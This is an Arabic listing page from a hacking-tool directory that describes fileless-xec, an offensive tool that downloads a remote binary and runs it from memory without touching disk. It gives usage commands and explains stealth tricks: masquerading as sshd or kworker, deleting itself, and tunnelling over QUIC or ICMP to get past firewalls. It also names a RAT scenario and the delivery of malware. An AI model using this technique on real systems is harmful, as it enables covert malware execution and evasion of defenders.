Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
fileless-xec — مُسقط خفي ينفذ ثنائيات عن بعد دون إسقاطها على القرص. (دعم HTTP3، دعم ICMP، مسارات غير مرئية، عبر المنصات،...) | Kitploit
أدوات/GitHubGitHub/ariary/fileless-xec
توليد الحمولةالاستغلالالتهرب من IDS/IPSما بعد الاستغلالتجاوز WAFاختبار الاختراقالقيادة والسيطرةالفريق الأحمرأداة الوصول عن بعدتطوير الحمولات
GitHubariary/fileless-xec

fileless-xec

209426منذ 2 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →

مُسقط خفي ينفذ ثنائيات عن بعد دون إسقاطها على القرص. (دعم HTTP3، دعم ICMP، مسارات غير مرئية، عبر المنصات،...)

عرض المستودع
مشاركة

➲ fileless-xec 🦜

👋 مفيد بالتأكيد، بشكل أساسي للمتعة، مستوحى تقريبًا من مقال 0x00 المقال

استخدامات اختبار الاختراق: يستخدم fileless-xec على الجهاز الهدف لتنفيذ ملف ثنائي موجود على جهاز المهاجم بشكل متخفٍ

➲ قصة قصيرة

يتيح لنا fileless-xec تنفيذ ملف ثنائي عن بُعد على جهاز محلي مباشرة من الذاكرة دون إسقاطه على القرص.

➪ التثبيت

  • استخدام بسيط fileless-xec [binary_url] (~curl | sh للثنائيات)
  • تنفيذ الثنائي باسم برنامج محدد: fileless-xec -n /usr/sbin/sshd [binary_url]
  • فصل تنفيذ البرنامج عن tty: fileless-xec --setsid [...]
  • demo

    شرح نريد تنفيذ الثنائي writeNsleep الموجود على جهاز عن بُعد محليًا. نبدأ أولاً خادم HTTP بلغة بايثون على الجهاز البعيد. محليًا، نستخدم fileless-xec ونتحكم باسم /usr/sbin/sshd لتنفيذ الثنائي writeNsleep (للتخفي والمتعة). بمجرد بدء writeNsleep، سيحذف fileless-xec نفسه (--self-remove)

    حالات استخدام أخرى

    • تنفيذ ثنائي مع stdout/stdin
    • تنفيذ ثنائي مع وسائط
    • fileless-xec الحذف الذاتي
    • تجاوز قيود الشبكة باستخدام ICMP
    • تجاوز جدار الحماية باستخدام HTTP3
    • "Go عن بعد": تنفيذ ثنائيات Go بدون تثبيت Go محليًا
    • تنفيذ سكربت شل
    • fileless-xec وضع الخادم
      • سيناريو RAT (حصان الوصول عن بُعد)
    • fileless-xec على ويندوز

    ➲ قصة التخفي

    • ملف الثنائي غير مرتبط بنظام ملفات المضيف
    • يمكن تخصيص اسم برنامج التنفيذ
    • يمكن تجاوز جدار الحماية من الجيل الثالث بدعم http3
    • fileless-xec يحذف نفسه بمجرد تشغيله

    memfd_create

    يتم تخزين ملف الثنائي البعيد محليًا باستخدام استدعاء النظام memfd_create، الذي يخزنه داخل قرص ذاكرة غير مرتبط بنظام الملفات (أي لا يمكنك العثور عليه باستخدام ls).

    ملاحظة: استدعاء النظام memfd_create غير موجود لنظام macOS.

    fexecve

    ثم ننفذه باستخدام استدعاء النظام fexecve (نظرًا لأنه غير متوفر حاليًا في مكتبة syscall للغة Go، نقوم بتنفيذه بأنفسنا).

    باستخدام fexecve يمكننا تنفيذ برنامج، لكننا نُشير إلى البرنامج المراد تشغيله باستخدام واصف ملف، بدلاً من المسار الكامل.

    HTTP3/QUIC

    قم بتفعيله باستخدام العلم -Q/http3.
    يمكنك إعداد خادم ويب خفيف يدعم http3 عن طريق تشغيل go run ./test/http3/light-server.go -p LISTENING PORT (هذا هو المعادل لـ http3 لأمر python3 -m http.server <listening_port>)
    استخدم test/http3/genkey.sh لتوليد الشهادة والمفتاح.

    QUIC UDP المعروف بـ http3 هو بروتوكول إنترنت من الجيل الجديد يُسرّع تطبيقات الويب عبر الإنترنت التي تتأثر بالتأخير، مثل البحث، بث الفيديو، إلخ، عن طريق تقليل زمن الرحلة ذهابًا وإيابًا (RTT) اللازم للاتصال بالخادم.

    نظرًا لأن QUIC يستخدم تشفيرًا مملوكًا يعادل TLS (سيتغير هذا في المستقبل مع نسخة موحدة)، تواجه جدران الحماية من الجيل الثالث التي توفر التحكم في التطبيقات والرؤية صعوبات في التحكم ومراقبة حركة مرور QUIC.

    إذا كنت تستخدم fileless-xec كموزع (لأغراض الاختبار فقط أو بإذن)، فمن المحتمل أنك تريد تنفيذ نوع من البرامج الضارة أو ملف آخر يمكن اكتشافه بواسطة تحليل الحزم. وبالتالي، مع تمكين Quic يمكنك تجاوز تحليل الحزم والحصول على برنامج ضار.

    أيضًا، في حالة استخدام جدار الحماية فقط للسماح/حظر حركة المرور، قد يحدث أن تنسى قواعد جدار الحماية بروتوكول UDP مما يجعل طلباتك تذهب تحت الرادار.

    مهارات أخرى للتخفي

    على الرغم من عدم وجوده على قرص الذاكرة، لا يزال من الممكن اكتشاف البرنامج الجاري باستخدام أمر ps على سبيل المثال.

    1. تغطية الآثار باسم برنامج مزيف

    fileless-xec --name <fake_name> <binary_raw_url> الاسم الافتراضي هو [kworker/u:0]

    1. الفصل عن tty لمحاكاة سلوك عملية خفيّة

    fileless-xec --setsid <binary_raw_url>.

    تحذيرات

    لا يزال من الممكن اكتشافك باستخدام:

    root@kitploit:~
    $ lsof | grep memfd
    

    أو أيضًا opensnoop (ولكن ليس بواسطة execsnoop)

    أو تدقيق ملف تعريف seccomp لاستدعاء النظام execve (لكنه مرهق جدًا لأن أمر sleep يستخدم أيضًا execve على سبيل المثال).

    تنزيل الأداة